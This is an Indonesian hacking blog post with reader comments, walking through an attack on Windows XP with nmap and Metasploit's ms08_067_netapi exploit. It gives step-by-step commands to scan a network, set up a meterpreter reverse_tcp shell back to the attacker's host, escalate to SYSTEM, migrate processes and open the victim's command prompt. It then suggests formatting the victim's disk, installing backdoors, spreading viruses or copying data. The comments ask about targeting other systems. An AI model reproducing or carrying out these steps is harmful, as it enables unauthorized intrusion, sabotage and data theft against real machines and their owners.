Kita akan coba exploit windows xp menggunakan Metasploit yang ada di Backtrack...
Males basa basi...langsung aja hehe...

Pertama kita scan IP dan Port yang terbuka pada jaringan menggunakan nmap (sudah ada d backtrack 5),
* buka terminal ketik perintah nmap -sn 192.168.0.1-255
-sn adalah perintah nmap untuk melakukan scanning IP yang aktif / tidak..
-192.168.0.1-255 adalah IP yang akan kita scan, dari 192.168.0.1 sampai 192.168.0.255
jadi untuk IP nya di sesuaikan dengan IP anda..

*lalu jika sudah menemukan IP yang aktif kita scan Port yang terbuka pada target..contoh saya mendapakan IP 192.168.0.4 lakukab perintah nmap -f 192.168.0.4
-f adalah fast scanning sehingga nmap akan melakukan scanning secepat mungkin...
lihat hasilnya























Jelas terlihat port 445 terbuka , langsung saja buka msfconsole atau Metasploit Framework versi console..
- ketik perintah msfconsole pada terminal/console..
tunggu biasanya agak lama...
- setelah terbuka ketik search netapi dan setelah itu kita gunakan yang exploit/windows/smb/ms08_067_netapi
- ketik perintah use exploit/windows/smb/ms08_067_netapi
- ketik show options untuk melihat opsi apa yang harus kita isi..























- RHOST belum kita setting ketik RHOST dengan ip target lakukan perintah set RHOST 192.168.0.4 ( jika ip target 192.168.0.4 )
- set LHOST 192.168.0.3 ( 192.168.0.3 adalah ip saya )
- set LPORT 4444 ( port pada Backtrack )
- set PAYLOAD windows/meterpreter/reverse_tcp
- jalankan exploit dengan perintah exploit
dan hasilnya























Kita sudah masuk pada Meterpreter :D
Sekarang kita akan mengendalikan Command Prompt ( CMD ) korban , tapi sebelumnya kita lihat dulu posisi kita...

pertama kita lihat siapa kita, dengan perintah getuid, dan outputnya NT AUTHORITY\SYSTEM , tapi bagaimana jika bukan NT AUTHORITY\SYSTEM alias si korban tidak menjalankan sebagai administrator pada komputernya? kita lakukan ketik perintah getsystem , lalu cek lagi dengan perintah getuid jika sudah NT AUTHORITY\SYSTEM lanjutkan...
kita ketik perintah pwd untuk cek keberadaan kita dan pada output saya adalah C:\WINDOWS\system32 langsung ketik perintah shell untuk eksekusi CMD..dan hasilnya






















tapi bagaimana jika ternyata error? tidak seperti di atas saat,error memasukan perintah shell...atau saat memasukan perintah shell tidak ke C:\Windows\system32 ???
mungkin procces dirrectory nya tidak tepat...
jika masalah seperti itu lakukan perintah migrate...kita akan berpindah..
ketik perintah ps pada meterpreter untuk melihat process ID yang ada...
setelah keluar kita  cari PID svchost.exe, jika sudah ketemu pindahlah dengan perintah migrate
contoh : migrate 1328
jika sukses, cek dengan perintah pwd , lalu jalankan perintah shell..
lihat gambar :










jika sudah berada di C:\Windows\system32> berarti masalah beres, kita lanjutkan....






Apa yang akan kita lakukan setelah kita berada pada saat sudah berada pada Metterpreter ataupun Command Prompt korban??
terserah anda..
mau Format Harddisk korban,shutdown,pasang backdoor,sebarin virus,copy data apalah terserah mau Remmote Desktop jg g ada yang larang :p

sekian , d tutorial selanjutnya mungkin akan saya bahas tentang salah satu cara diatas...

THANKS TO :  Red Dragon & Blusp10it

15 komentar:

Penulis mengatakan...

mas kalo ke windows 7 bisa g ya..... :\
numpang nitip url ya mas tips dan trik :D

Dabllink mengatakan...

saya sendiri belum coba ,tapi menurut saya bisa..d coba aja...

w174rd mengatakan...

wah mantap nih tutornya!!
saya pelajarin dulu om...thanks. =))

Dabllink mengatakan...

silahkan om, semoga bermanfaat :D

Root mengatakan...

Om numpang tanya, bagaimana dengan exploit ubuntu om? bisa gk? makasih sebelumnyaaa ;)

Dabllink mengatakan...

@root saya belum coba, tapi pernah baca om :D ..
temen saya jg udah pernah exploit ubuntu pake BT..maaf blm bisa bantu, cz blm saya coba..tar deh saya cb nyari dl yg pake ubuntu :D

Anonim mengatakan...

ajib.....

Anonim mengatakan...

g' jalan d win 7 ya mas bro ????

:( :( :(

Dabllink mengatakan...

tergantung vulnnya gan :) ..
kl masih ada vuln ms08-67 masih bisa d exploit dgn payload d atas...cb aja kirim payload k target, tar kl ada wkt sy share ini buktinya https://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-prn1/553314_2055378680497_1725483864_1093639_725359407_n.jpg ;)

b3nyok mengatakan...

tp kyk,a di windows 7 udah g vuL dech,,jd harus nanem backdoor,,maap klw salah,,,hehehhe

Dabllink mengatakan...

iya gan kita harus kirim payload ke kompi target..tapi kebanyakan ga bisa...
tuh buktinya d gambar atas laptop advan pake w7 bisa kena.. :) tergantung jg..

Anonim mengatakan...

misi om saya mau tanya jika kita menerima ip dari server apa set LHOST .. ip sendiri atau ip si server dan jika ip server apa perlu mengganti set LPORT menjati port si server atau masih sama saja portnya dari bt?
maaf kalo kebanyakan maklum masih belajar :D
terima kasih sebelumnya

Dabllink mengatakan...

@anonim : ip kita sendiri , bisa dilihat di ifconfig..
portnya 4444 saja biar ga bingung, moga berhasil.. :D

Anonim mengatakan...

gan mau tanya, waktu exploit. hanya sampai attemping to trigger the vull, saja. kenapa ya gan. mohon sulusinya

Loker Ilmu IT mengatakan...

beuuhh keren banget bang :x thank infonya ,, nice
+++++++++++++++++++++++++++++
http://lokerilmu-it.blogspot.com

Posting Komentar

:)) :)] ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* : 8-} ~x( :-t b-( :-L x( =))

Copyright 2010 Blog Iseng
Suported by : Indonesia lost-c0de™ > ID-10t